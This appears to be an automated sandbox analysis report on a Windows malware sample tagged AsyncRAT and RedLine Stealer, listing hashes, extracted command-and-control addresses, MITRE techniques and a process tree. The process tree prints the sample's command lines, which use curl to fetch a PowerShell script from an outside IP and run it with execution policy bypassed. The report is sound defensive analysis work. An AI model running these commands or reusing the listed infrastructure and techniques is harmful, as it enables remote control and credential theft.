asyncrat | 55466ebc5b9c9e17e47e2af745c118001c1163eaa9aa945760f90b2af3f8362c

Analysis

max time kernel
151s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
15-12-2022 04:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

6KB
MD5

285cbd341de6e17b42f1663245a58346
SHA1

5281aa0f428bca4b5eeafda1b7eefc5735490d09
SHA256

55466ebc5b9c9e17e47e2af745c118001c1163eaa9aa945760f90b2af3f8362c
SHA512

4a66b1409d84376228b4276dd13f0bd42aee0e935755faf01bde72c2b8a2d69da9addd55cf41a3c4a47ca06795f70ee6452976edc10de1b1ccea8705b3cd047d
SSDEEP

96:7sfW3+7yyZLiS9co2FhRPr4SNkyfkkWFnU:7/22Fhx4SGQz

Score

10^/10

asyncrat redline spoofer venom clients discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

SPOOFER

20.197.226.40:32619

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

20.197.226.40:4448

Mutex

CHECK_SYSTEMHOST

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4712-148-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3696 created 1876 3696 powershell.exe TrustedInstaller.exe

description	pid	process	target process
PID 3696 created 1876	3696	powershell.exe	TrustedInstaller.exe

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4428-209-0x0000000000560000-0x0000000000576000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

192 3732 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Ynraflilhuhdhncsolreloader.exeUpdeter.exe

pid process

4976 Ynraflilhuhdhncsolreloader.exe
3232 Updeter.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

5884 attrib.exe

flow	pid	process
192	3732	powershell.exe

pid	process
4976	Ynraflilhuhdhncsolreloader.exe
3232	Updeter.exe

pid	process
5884	attrib.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

tmp.exetmp.exeWScript.exeRegAsm.exeUpdeter.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	tmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	tmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Updeter.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

Ynraflilhuhdhncsolreloader.exe

pid process

4976 Ynraflilhuhdhncsolreloader.exe
4976 Ynraflilhuhdhncsolreloader.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

pid	process
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

tmp.exepowershell.exe

description	pid	process	target process
PID 4948 set thread context of 4712	4948	tmp.exe	tmp.exe
PID 4404 set thread context of 4428	4404	powershell.exe	RegAsm.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\8c55141c-c737-4396-8126-bd13e784a9f7.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221215052155.pma	setup.exe

Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

4040 sc.exe
1976 sc.exe
5040 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

6028 4976 WerFault.exe Ynraflilhuhdhncsolreloader.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

228 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4540 timeout.exe

pid	process
4040	sc.exe
1976	sc.exe
5040	sc.exe

pid	pid_target	process	target process
6028	4976	WerFault.exe	Ynraflilhuhdhncsolreloader.exe

pid	process
228	schtasks.exe

pid	process
4540	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe

Modifies registry class 2 IoCs

Processes:

tmp.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	tmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Ynraflilhuhdhncsolreloader.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\703299E1514C82B61E55EF38C8EA17FF5FB4B27F	Ynraflilhuhdhncsolreloader.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys\703299E1514C82B61E55EF38C8EA17FF5FB4B27F\Blob = 02000000000000006c0000001c000000000000000100000020000000000000000000000002000000300035003100350031006400650036002d0034006400630031002d0034003400300032002d0039003700390064002d006600360061003200620066003300650063003900350039000000000000000000230000000000000014000000703299e1514c82b61e55ef38c8ea17ff5fb4b27f	Ynraflilhuhdhncsolreloader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\MY\Keys	Ynraflilhuhdhncsolreloader.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeYnraflilhuhdhncsolreloader.exetmp.exe

pid	process
4308	powershell.exe
4308	powershell.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4712	tmp.exe
4712	tmp.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe
4976	Ynraflilhuhdhncsolreloader.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

msedge.exe

pid	process
4992	msedge.exe
4992	msedge.exe
4992	msedge.exe
4992	msedge.exe
4992	msedge.exe
4992	msedge.exe
4992	msedge.exe
4992	msedge.exe
4992	msedge.exe
4992	msedge.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

tmp.exepowershell.exetmp.exepowershell.exeRegAsm.exepowershell.exewhoami.exepowershell.exepowershell.exepowershell.exepowershell.exewhoami.exe

description	pid	process
Token: SeDebugPrivilege	4948	tmp.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	4712	tmp.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	4428	RegAsm.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	2944	whoami.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe
Token: SeDebugPrivilege	2488	whoami.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

4992 msedge.exe
4992 msedge.exe
4992 msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Ynraflilhuhdhncsolreloader.exe

pid process

4976 Ynraflilhuhdhncsolreloader.exe

pid	process
4976	Ynraflilhuhdhncsolreloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.exetmp.exeWScript.execmd.execmd.execmd.execmd.exepowershell.exemsedge.exeRegAsm.exepowershell.exe

description	pid	process	target process
PID 4948 wrote to memory of 4308	4948	tmp.exe	powershell.exe
PID 4948 wrote to memory of 4308	4948	tmp.exe	powershell.exe
PID 4948 wrote to memory of 4308	4948	tmp.exe	powershell.exe
PID 4948 wrote to memory of 4976	4948	tmp.exe	Ynraflilhuhdhncsolreloader.exe
PID 4948 wrote to memory of 4976	4948	tmp.exe	Ynraflilhuhdhncsolreloader.exe
PID 4948 wrote to memory of 4712	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4712	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4712	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4712	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4712	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4712	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4712	4948	tmp.exe	tmp.exe
PID 4948 wrote to memory of 4712	4948	tmp.exe	tmp.exe
PID 4712 wrote to memory of 4020	4712	tmp.exe	WScript.exe
PID 4712 wrote to memory of 4020	4712	tmp.exe	WScript.exe
PID 4712 wrote to memory of 4020	4712	tmp.exe	WScript.exe
PID 4020 wrote to memory of 1660	4020	WScript.exe	cmd.exe
PID 4020 wrote to memory of 1660	4020	WScript.exe	cmd.exe
PID 4020 wrote to memory of 1660	4020	WScript.exe	cmd.exe
PID 1660 wrote to memory of 1156	1660	cmd.exe	cmd.exe
PID 1660 wrote to memory of 1156	1660	cmd.exe	cmd.exe
PID 1660 wrote to memory of 1156	1660	cmd.exe	cmd.exe
PID 1156 wrote to memory of 1388	1156	cmd.exe	curl.exe
PID 1156 wrote to memory of 1388	1156	cmd.exe	curl.exe
PID 1156 wrote to memory of 1388	1156	cmd.exe	curl.exe
PID 4020 wrote to memory of 3744	4020	WScript.exe	cmd.exe
PID 4020 wrote to memory of 3744	4020	WScript.exe	cmd.exe
PID 4020 wrote to memory of 3744	4020	WScript.exe	cmd.exe
PID 3744 wrote to memory of 2976	3744	cmd.exe	cmd.exe
PID 3744 wrote to memory of 2976	3744	cmd.exe	cmd.exe
PID 3744 wrote to memory of 2976	3744	cmd.exe	cmd.exe
PID 2976 wrote to memory of 4404	2976	cmd.exe	powershell.exe
PID 2976 wrote to memory of 4404	2976	cmd.exe	powershell.exe
PID 2976 wrote to memory of 4404	2976	cmd.exe	powershell.exe
PID 4404 wrote to memory of 4428	4404	powershell.exe	RegAsm.exe
PID 4404 wrote to memory of 4428	4404	powershell.exe	RegAsm.exe
PID 4404 wrote to memory of 4428	4404	powershell.exe	RegAsm.exe
PID 4404 wrote to memory of 4428	4404	powershell.exe	RegAsm.exe
PID 4404 wrote to memory of 4428	4404	powershell.exe	RegAsm.exe
PID 4404 wrote to memory of 4428	4404	powershell.exe	RegAsm.exe
PID 4404 wrote to memory of 4428	4404	powershell.exe	RegAsm.exe
PID 4404 wrote to memory of 4428	4404	powershell.exe	RegAsm.exe
PID 4020 wrote to memory of 4992	4020	WScript.exe	msedge.exe
PID 4020 wrote to memory of 4992	4020	WScript.exe	msedge.exe
PID 4992 wrote to memory of 1276	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 1276	4992	msedge.exe	msedge.exe
PID 4428 wrote to memory of 3696	4428	RegAsm.exe	powershell.exe
PID 4428 wrote to memory of 3696	4428	RegAsm.exe	powershell.exe
PID 4428 wrote to memory of 3696	4428	RegAsm.exe	powershell.exe
PID 3696 wrote to memory of 5040	3696	powershell.exe	sc.exe
PID 3696 wrote to memory of 5040	3696	powershell.exe	sc.exe
PID 3696 wrote to memory of 5040	3696	powershell.exe	sc.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe
PID 4992 wrote to memory of 4820	4992	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

5884 attrib.exe

pid	process
5884	attrib.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4308

C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
"C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4976

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4976 -s 1848
3⤵
- Program crash
PID:6028

C:\Users\Admin\AppData\Local\Temp\tmp.exe
C:\Users\Admin\AppData\Local\Temp\tmp.exe
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4712

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\updeter.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4020

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
4⤵
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
5⤵
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\SysWOW64\curl.exe
curl http://20.127.168.10/assets/client.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
6⤵
PID:1388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
4⤵
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
5⤵
- Suspicious use of WriteProcessMemory
PID:2976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
6⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
7⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
